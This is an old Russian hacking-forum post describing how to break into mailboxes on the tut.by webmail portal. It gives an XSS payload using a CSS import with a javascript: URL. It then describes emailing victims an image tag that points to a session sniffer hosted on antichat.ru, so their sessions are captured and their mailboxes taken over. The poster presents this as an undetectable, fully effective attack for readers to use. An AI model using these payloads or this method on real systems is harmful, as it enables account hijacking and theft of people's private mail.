16.10.2005, 10:03
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Взлом tut.by
Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:
Код:
<style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>
Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:
Код:
Привет, как дела?
<img src="http://antichat.ru/cgi-bin/s.jpg">
и подписываешься на снифер. ВСЁ! Ящик твой.
Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.
Если прибавишь мне репутацию, то я не обижусь.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.10.2005 в 13:45..
|
|
|